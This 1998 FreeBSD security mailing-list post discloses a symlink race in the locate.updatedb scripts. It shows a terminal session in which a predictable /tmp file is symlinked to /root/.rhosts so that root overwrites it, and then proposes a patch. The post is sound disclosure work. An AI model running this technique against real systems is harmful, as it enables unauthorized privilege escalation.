Date: Thu, 23 Apr 1998 16:09:46 +1000 (EST) From: Nicholas Charles Brawn <ncb05@uow.edu.au> To: freebsd-security@FreeBSD.ORG Subject: Symlinks again... Message-ID: <Pine.SOL.3.96.980423160425.8809A-100000@banshee.cs.uow.edu.au>
next in thread | raw e-mail | index | archive | help
Another symlink problem.
The script /usr/libexec/locate.updatedb and /usr/libexec/locate.mklocatedb
create predictable filenames in /tmp. Example attack is shown below.
nbrawn@devel:~$ uname -a
FreeBSD devel 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Sun Apr 19 18:51:09 EST
1998 root@devel:/usr/src/sys/compile/devel i386
nbrawn@devel:~$ ls /tmp
total 2
drwxrwxrwt 2 bin bin 512 Apr 23 15:28 ./
drwxr-xr-x 18 root wheel 512 Apr 23 15:14 ../
nbrawn@devel:~$ /usr/libexec/locate.updatedb
[1]+ Stopped /usr/libexec/locate.updatedb
nbrawn@devel:~$ ls /tmp
total 2
drwxrwxrwt 2 bin bin 512 Apr 23 15:28 ./
drwxr-xr-x 18 root wheel 512 Apr 23 15:14 ../
-rw------- 1 nbrawn bin 0 Apr 23 15:28 _mklocatedb575.list
-rw-r--r-- 1 nbrawn bin 0 Apr 23 15:28 _updatedb571
nbrawn@devel:~$ fg
/usr/libexec/locate.updatedb
locate.mklocatedb: cannot build locate database
nbrawn@devel:~$ ps
PID TT STAT TIME COMMAND
172 v2 Is 0:00.37 -bash (bash)
173 v3 Ss 0:00.96 -bash (bash)
584 v3 R+ 0:00.00 ps
nbrawn@devel:~$ ln -s /root/.rhosts /tmp/_mklocatedb591.list
nbrawn@devel:~$ su
Password:
su-2.01# /usr/libexec/locate.updatedb
[1]+ Stopped /usr/libexec/locate.updatedb
su-2.01# ls /tmp
total 2
drwxrwxrwt 2 bin bin 512 Apr 23 15:29 ./
drwxr-xr-x 18 root wheel 512 Apr 23 15:14 ../
lrwxrwxrwx 1 nbrawn bin 13 Apr 23 15:29 _mklocatedb591.list@ -> /root/.rhosts
-rw-r--r-- 1 root bin 0 Apr 23 15:29 _updatedb587
su-2.01# fg
/usr/libexec/locate.updatedb
su-2.01# ls /root/.rhosts
-rw------- 1 root wheel 439009 Apr 23 15:30 /root/.rhosts
su-2.01# exit
exit
nbrawn@devel:~$
The problem appears easily fixed by editing the problem scripts and adding a
few lines:
#!/bin/sh
#
# Copyright (c) September 1995 Wolfram Schneider <wosch@FreeBSD.org>. Berlin.
# All rights reserved.
[snip]
# mklocatedb - build locate database
#
# usage: mklocatedb [-presort] < filelist > database
#
# $Id: mklocatedb.sh,v 1.2.2.1 1997/12/13 18:21:02 sef Exp $
[snip]
umask 077 # protect temp files
export ROOTDIR=/var/run
TMPDIR=${TMPDIR:-/tmp}; export TMPDIR
if test X"$TMPDIR" = X -o ! -d "$TMPDIR"; then
TMPDIR=/tmp; export TMPDIR
fi
[snip]
if [ "$USER" != "root" ] # won't work if su'ing, someone think of a
then # better check :)
bigrams=$TMPDIR/_mklocatedb$$.bigrams
filelist=$TMPDIR/_mklocatedb$$.list
else
bigrams=$ROOTDIR/_mklocatedb$$.bigrams
filelist=$ROOTDIR/_mklocatedb$$.list
fi
How many other programs/scripts in FreeBSD -stable and -current are
using /tmp that should be using /var/run?
Nicholas Brawn
ps, sorry for the long post :)
--
Email: ncb05@uow.edu.au
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.SOL.3.96.980423160425.8809A-100000>